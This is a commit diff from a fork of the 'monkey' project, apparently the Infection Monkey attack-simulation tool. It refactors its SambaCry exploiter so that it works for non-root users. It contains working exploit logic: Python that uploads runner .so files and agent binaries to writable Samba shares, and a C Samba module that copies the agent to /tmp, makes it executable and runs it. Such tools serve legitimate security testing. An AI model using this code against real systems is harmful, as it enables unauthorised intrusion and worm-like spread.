forked from p34709852/monkey
Fix SambaCry not working for non-root user
This commit is contained in:
parent
62713932de
commit
65872d9518
|
@ -111,7 +111,7 @@ class Configuration(object):
|
|||
# dropper config
|
||||
###########################
|
||||
|
||||
dropper_try_move_first = sys.argv[0].endswith(".exe")
|
||||
dropper_try_move_first = True
|
||||
dropper_set_date = True
|
||||
dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll"
|
||||
dropper_date_reference_path_linux = '/bin/sh'
|
||||
|
@ -260,22 +260,6 @@ class Configuration(object):
|
|||
sambacry_folder_paths_to_guess = ['/', '/mnt', '/tmp', '/storage', '/export', '/share', '/shares', '/home']
|
||||
# Shares to not check if they're writable.
|
||||
sambacry_shares_not_to_check = ["IPC$", "print$"]
|
||||
# Name of file which contains the monkey's commandline
|
||||
sambacry_commandline_filename = "monkey_commandline.txt"
|
||||
# Name of file which contains the runner's result
|
||||
sambacry_runner_result_filename = "monkey_runner_result"
|
||||
# SambaCry runner filename (32 bit)
|
||||
sambacry_runner_filename_32 = "sc_monkey_runner32.so"
|
||||
# SambaCry runner filename (64 bit)
|
||||
sambacry_runner_filename_64 = "sc_monkey_runner64.so"
|
||||
# Monkey filename on share (32 bit)
|
||||
sambacry_monkey_filename_32 = "monkey32"
|
||||
# Monkey filename on share (64 bit)
|
||||
sambacry_monkey_filename_64 = "monkey64"
|
||||
# Monkey copy filename on share (32 bit)
|
||||
sambacry_monkey_copy_filename_32 = "monkey32_2"
|
||||
# Monkey copy filename on share (64 bit)
|
||||
sambacry_monkey_copy_filename_64 = "monkey64_2"
|
||||
|
||||
# system info collection
|
||||
collect_system_info = True
|
||||
|
|
|
@ -27,7 +27,7 @@
|
|||
|
||||
"kill_file_path_linux": "/var/run/monkey.not",
|
||||
"kill_file_path_windows": "%windir%\\monkey.not",
|
||||
"dropper_try_move_first": false,
|
||||
"dropper_try_move_first": true,
|
||||
"exploiter_classes": [
|
||||
"SSHExploiter",
|
||||
"SmbExploiter",
|
||||
|
@ -70,14 +70,6 @@
|
|||
"sambacry_trigger_timeout": 5,
|
||||
"sambacry_folder_paths_to_guess": ["", "/mnt", "/tmp", "/storage", "/export", "/share", "/shares", "/home"],
|
||||
"sambacry_shares_not_to_check": ["IPC$", "print$"],
|
||||
"sambacry_commandline_filename": "monkey_commandline.txt",
|
||||
"sambacry_runner_result_filename": "monkey_runner_result",
|
||||
"sambacry_runner_filename_32": "sc_monkey_runner32.so",
|
||||
"sambacry_runner_filename_64": "sc_monkey_runner64.so",
|
||||
"sambacry_monkey_filename_32": "monkey32",
|
||||
"sambacry_monkey_filename_64": "monkey64",
|
||||
"sambacry_monkey_copy_filename_32": "monkey32_2",
|
||||
"sambacry_monkey_copy_filename_64": "monkey64_2",
|
||||
"local_network_scan": false,
|
||||
"tcp_scan_get_banner": true,
|
||||
"tcp_scan_interval": 200,
|
||||
|
|
|
@ -33,6 +33,23 @@ class SambaCryExploiter(HostExploiter):
|
|||
"""
|
||||
_target_os_type = ['linux']
|
||||
|
||||
# Name of file which contains the monkey's commandline
|
||||
SAMBACRY_COMMANDLINE_FILENAME = "monkey_commandline.txt"
|
||||
# Name of file which contains the runner's result
|
||||
SAMBACRY_RUNNER_RESULT_FILENAME = "monkey_runner_result"
|
||||
# SambaCry runner filename (32 bit)
|
||||
SAMBACRY_RUNNER_FILENAME_32 = "sc_monkey_runner32.so"
|
||||
# SambaCry runner filename (64 bit)
|
||||
SAMBACRY_RUNNER_FILENAME_64 = "sc_monkey_runner64.so"
|
||||
# Monkey filename on share (32 bit)
|
||||
SAMBACRY_MONKEY_FILENAME_32 = "monkey32"
|
||||
# Monkey filename on share (64 bit)
|
||||
SAMBACRY_MONKEY_FILENAME_64 = "monkey64"
|
||||
# Monkey copy filename on share (32 bit)
|
||||
SAMBACRY_MONKEY_COPY_FILENAME_32 = "monkey32_2"
|
||||
# Monkey copy filename on share (64 bit)
|
||||
SAMBACRY_MONKEY_COPY_FILENAME_64 = "monkey64_2"
|
||||
|
||||
def __init__(self):
|
||||
self._config = __import__('config').WormConfiguration
|
||||
|
||||
|
@ -97,10 +114,9 @@ class SambaCryExploiter(HostExploiter):
|
|||
"""
|
||||
smb_client = self.connect_to_server(ip, creds)
|
||||
tree_id = smb_client.connectTree(share)
|
||||
file_list = [self._config.sambacry_commandline_filename, self._config.sambacry_runner_result_filename,
|
||||
self._config.sambacry_runner_filename_32, self._config.sambacry_runner_filename_64,
|
||||
self._config.sambacry_monkey_filename_32, self._config.sambacry_monkey_filename_64,
|
||||
self._config.sambacry_monkey_copy_filename_32, self._config.sambacry_monkey_copy_filename_64]
|
||||
file_list = [self.SAMBACRY_COMMANDLINE_FILENAME, self.SAMBACRY_RUNNER_RESULT_FILENAME,
|
||||
self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64,
|
||||
self.SAMBACRY_MONKEY_FILENAME_32, self.SAMBACRY_MONKEY_FILENAME_64]
|
||||
|
||||
for filename in file_list:
|
||||
try:
|
||||
|
@ -123,7 +139,7 @@ class SambaCryExploiter(HostExploiter):
|
|||
tree_id = smb_client.connectTree(share)
|
||||
file_content = None
|
||||
try:
|
||||
file_id = smb_client.openFile(tree_id, "\\%s" % self._config.sambacry_runner_result_filename,
|
||||
file_id = smb_client.openFile(tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME,
|
||||
desiredAccess=FILE_READ_DATA)
|
||||
file_content = smb_client.readFile(tree_id, file_id)
|
||||
smb_client.closeFile(tree_id, file_id)
|
||||
|
@ -251,22 +267,22 @@ class SambaCryExploiter(HostExploiter):
|
|||
|
||||
with self.get_monkey_commandline_file(host, depth,
|
||||
self._config.dropper_target_path_linux) as monkey_commandline_file:
|
||||
smb_client.putFile(share, "\\%s" % self._config.sambacry_commandline_filename, monkey_commandline_file.read)
|
||||
smb_client.putFile(share, "\\%s" % self.SAMBACRY_COMMANDLINE_FILENAME, monkey_commandline_file.read)
|
||||
|
||||
with self.get_monkey_runner_bin_file(True) as monkey_runner_bin_file:
|
||||
smb_client.putFile(share, "\\%s" % self._config.sambacry_runner_filename_32, monkey_runner_bin_file.read)
|
||||
smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_32, monkey_runner_bin_file.read)
|
||||
|
||||
with self.get_monkey_runner_bin_file(False) as monkey_runner_bin_file:
|
||||
smb_client.putFile(share, "\\%s" % self._config.sambacry_runner_filename_64, monkey_runner_bin_file.read)
|
||||
smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_64, monkey_runner_bin_file.read)
|
||||
|
||||
monkey_bin_32_src_path = get_target_monkey_by_os(False, True)
|
||||
monkey_bin_64_src_path = get_target_monkey_by_os(False, False)
|
||||
|
||||
with monkeyfs.open(monkey_bin_32_src_path, "rb") as monkey_bin_file:
|
||||
smb_client.putFile(share, "\\%s" % self._config.sambacry_monkey_filename_32, monkey_bin_file.read)
|
||||
smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_32, monkey_bin_file.read)
|
||||
|
||||
with monkeyfs.open(monkey_bin_64_src_path, "rb") as monkey_bin_file:
|
||||
smb_client.putFile(share, "\\%s" % self._config.sambacry_monkey_filename_64, monkey_bin_file.read)
|
||||
smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read)
|
||||
|
||||
smb_client.disconnectTree(tree_id)
|
||||
|
||||
|
@ -323,14 +339,14 @@ class SambaCryExploiter(HostExploiter):
|
|||
:return: Array of possible full paths to the module.
|
||||
"""
|
||||
sambacry_folder_paths_to_guess = self._config.sambacry_folder_paths_to_guess
|
||||
file_names = [self._config.sambacry_runner_filename_32, self._config.sambacry_runner_filename_64]
|
||||
file_names = [self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64]
|
||||
return [posixpath.join(*x) for x in itertools.product(sambacry_folder_paths_to_guess, [share_name], file_names)]
|
||||
|
||||
def get_monkey_runner_bin_file(self, is_32bit):
|
||||
if is_32bit:
|
||||
return open(path.join(get_binaries_dir_path(), self._config.sambacry_runner_filename_32), "rb")
|
||||
return open(path.join(get_binaries_dir_path(), self.SAMBACRY_RUNNER_FILENAME_32), "rb")
|
||||
else:
|
||||
return open(path.join(get_binaries_dir_path(), self._config.sambacry_runner_filename_64), "rb")
|
||||
return open(path.join(get_binaries_dir_path(), self.SAMBACRY_RUNNER_FILENAME_64), "rb")
|
||||
|
||||
def get_monkey_commandline_file(self, host, depth, location):
|
||||
return BytesIO(DROPPER_ARG + build_monkey_commandline(host, depth - 1, location))
|
||||
|
|
|
@ -1,9 +1,9 @@
|
|||
#!/usr/bin/env bash
|
||||
gcc -c -Wall -Werror -fpic -m64 sc_monkey_runner.c
|
||||
gcc -shared -m64 -o sc_monkey_runner_64.so sc_monkey_runner.o
|
||||
gcc -shared -m64 -o sc_monkey_runner64.so sc_monkey_runner.o
|
||||
rm sc_monkey_runner.o
|
||||
strip sc_monkey_runner_64.so
|
||||
strip sc_monkey_runner64.so
|
||||
gcc -c -Wall -Werror -fpic -m32 sc_monkey_runner.c
|
||||
gcc -shared -m32 -o sc_monkey_runner_32.so sc_monkey_runner.o
|
||||
gcc -shared -m32 -o sc_monkey_runner32.so sc_monkey_runner.o
|
||||
rm sc_monkey_runner.o
|
||||
strip sc_monkey_runner_32.so
|
||||
strip sc_monkey_runner32.so
|
|
@ -22,16 +22,16 @@ int samba_init_module(void)
|
|||
#ifdef ARCH_IS_64
|
||||
const char RUNNER_FILENAME[] = "sc_monkey_runner64.so";
|
||||
const char MONKEY_NAME[] = "monkey64";
|
||||
const char MONKEY_COPY_NAME[] = "monkey64_2";
|
||||
#else
|
||||
const char RUNNER_FILENAME[] = "sc_monkey_runner32.so";
|
||||
const char MONKEY_NAME[] = "monkey32";
|
||||
const char MONKEY_COPY_NAME[] = "monkey32_2";
|
||||
#endif
|
||||
const char RUNNER_RESULT_FILENAME[] = "monkey_runner_result";
|
||||
const char COMMANDLINE_FILENAME[] = "monkey_commandline.txt";
|
||||
const int ACCESS_MODE = 0777;
|
||||
const char RUN_MONKEY_CMD[] = "sudo ./";
|
||||
const char RUN_MONKEY_CMD[] = "./";
|
||||
const char MONKEY_DEST_FOLDER[] = "/tmp";
|
||||
const char MONKEY_DEST_NAME[] = "monkey";
|
||||
|
||||
int found = 0;
|
||||
char modulePathLine[LINE_MAX_LENGTH] = {'\0'};
|
||||
|
@ -102,7 +102,7 @@ int samba_init_module(void)
|
|||
|
||||
// Build commandline
|
||||
strncat(commandline, RUN_MONKEY_CMD, sizeof(RUN_MONKEY_CMD) - 1);
|
||||
strncat(commandline, MONKEY_COPY_NAME, sizeof(MONKEY_COPY_NAME) - 1);
|
||||
strncat(commandline, MONKEY_DEST_NAME, sizeof(MONKEY_DEST_NAME) - 1);
|
||||
strncat(commandline, " ", 1);
|
||||
|
||||
fread(commandline + strlen(commandline), 1, LINE_MAX_LENGTH, pFile);
|
||||
|
@ -133,7 +133,12 @@ int samba_init_module(void)
|
|||
fread(monkeyBinary, 1, monkeySize, pFile);
|
||||
fclose(pFile);
|
||||
|
||||
pFile = fopen(MONKEY_COPY_NAME, "wb");
|
||||
if (0 != chdir(MONKEY_DEST_FOLDER))
|
||||
{
|
||||
return 0;
|
||||
}
|
||||
|
||||
pFile = fopen(MONKEY_DEST_NAME, "wb");
|
||||
if (NULL == pFile)
|
||||
{
|
||||
free(monkeyBinary);
|
||||
|
@ -144,7 +149,7 @@ int samba_init_module(void)
|
|||
free(monkeyBinary);
|
||||
|
||||
// Change monkey permissions
|
||||
if (0 != chmod(MONKEY_COPY_NAME, ACCESS_MODE))
|
||||
if (0 != chmod(MONKEY_DEST_NAME, ACCESS_MODE))
|
||||
{
|
||||
return 0;
|
||||
}
|
||||
|
|
|
@ -587,46 +587,6 @@ SCHEMA = {
|
|||
"IPC$", "print$"
|
||||
],
|
||||
"description": "These shares won't be checked when exploiting with SambaCry"
|
||||
},
|
||||
"sambacry_commandline_filename": {
|
||||
"title": "SambaCry commandline filename",
|
||||
"type": "string",
|
||||
"default": "monkey_commandline.txt",
|
||||
},
|
||||
"sambacry_runner_result_filename": {
|
||||
"title": "SambaCry runner result filename",
|
||||
"type": "string",
|
||||
"default": "monkey_runner_result",
|
||||
},
|
||||
"sambacry_runner_filename_32": {
|
||||
"title": "SambaCry runner filename (32 bit)",
|
||||
"type": "string",
|
||||
"default": "sc_monkey_runner32.so",
|
||||
},
|
||||
"sambacry_runner_filename_64": {
|
||||
"title": "SambaCry runner filename (64 bit)",
|
||||
"type": "string",
|
||||
"default": "sc_monkey_runner64.so",
|
||||
},
|
||||
"sambacry_monkey_filename_32": {
|
||||
"title": "SambaCry monkey filename (32 bit)",
|
||||
"type": "string",
|
||||
"default": "monkey32",
|
||||
},
|
||||
"sambacry_monkey_filename_64": {
|
||||
"title": "SambaCry monkey filename (64 bit)",
|
||||
"type": "string",
|
||||
"default": "monkey64",
|
||||
},
|
||||
"sambacry_monkey_copy_filename_32": {
|
||||
"title": "SambaCry monkey copy filename (32 bit)",
|
||||
"type": "string",
|
||||
"default": "monkey32_2",
|
||||
},
|
||||
"sambacry_monkey_copy_filename_64": {
|
||||
"title": "SambaCry monkey copy filename (64 bit)",
|
||||
"type": "string",
|
||||
"default": "monkey64_2",
|
||||
}
|
||||
}
|
||||
},
|
||||
|
|
Loading…
Reference in New Issue